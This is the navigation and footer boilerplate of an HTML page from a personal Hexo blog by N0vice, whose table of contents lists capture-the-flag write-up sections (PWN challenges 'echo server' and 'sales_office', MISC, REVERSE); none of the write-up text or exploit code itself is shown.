              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN"><span class="nav-number">1.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#echo-server"><span class="nav-number">1.1.</span> <span class="nav-text">echo server</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#分析"><span class="nav-number">1.1.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">1.1.2.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sales-office"><span class="nav-number">1.2.</span> <span class="nav-text">sales_office</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#分析-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">exp</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#签到"><span class="nav-number">2.1.</span> <span class="nav-text">签到</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#REVERSE"><span class="nav-number">3.</span> <span class="nav-text">REVERSE</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number">4.</span> <span class="nav-text"></span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">N0vice</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
